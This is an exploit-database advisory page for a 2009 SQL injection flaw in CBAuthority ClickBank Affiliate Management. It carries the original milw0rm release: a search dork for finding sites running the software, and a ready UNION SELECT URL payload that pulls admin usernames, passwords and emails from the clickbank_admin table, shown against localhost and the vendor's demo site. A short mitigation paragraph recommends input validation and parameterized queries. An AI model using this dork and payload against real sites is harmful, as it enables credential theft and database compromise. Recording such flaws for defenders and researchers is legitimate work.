CBAuthority - ClickBank Affiliate Management SQL Injection Vulnerability

vendor:

CBAuthority - ClickBank Affiliate Management

by:

Angela Chang

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: CBAuthority - ClickBank Affiliate Management

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

CBAuthority – ClickBank Affiliate Management SQL Injection Vulnerability

An SQL injection vulnerability exists in CBAuthority - ClickBank Affiliate Management. An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to the application's database and potentially compromise the application and its data.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

(o)===========================================================================================(o)

                 -:-          CBAuthority - ClickBank Affiliate Management SQL Injection Vulnerability       -:-


            Vendor : http://www.cbauthority.com/
            Author  : Angela Chang
            Contact : angel@ch4ng.cc
            Date     : 17 august 2009

(o)===========================================================================================(o)


Dork   :
   
       Powered by CBAuthority


Vulnerabilities   :

      http://localhost/path/main.php?command=view_product&id=-1 UNION SELECT 0,concat_ws(0x7c,username,password,email),2,3,4,5,6,7,8,9,10,11,12,13 from clickbank_admin--



Demo  :


      http://www.cbauthority.com/demo/main.php?command=view_product&id=-18 UNION SELECT 0,concat_ws(0x7c,username,password,email),2,3,4,5,6,7,8,9,10,11,12,13 from clickbank_admin--




(o)===========================================================================================(o)

Greetz   :   -:-  SkyCreW  -:-

     Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf ,   home_edition2001   ,   str0ke


(o)===========================================================================================(o)

# milw0rm.com [2009-08-18]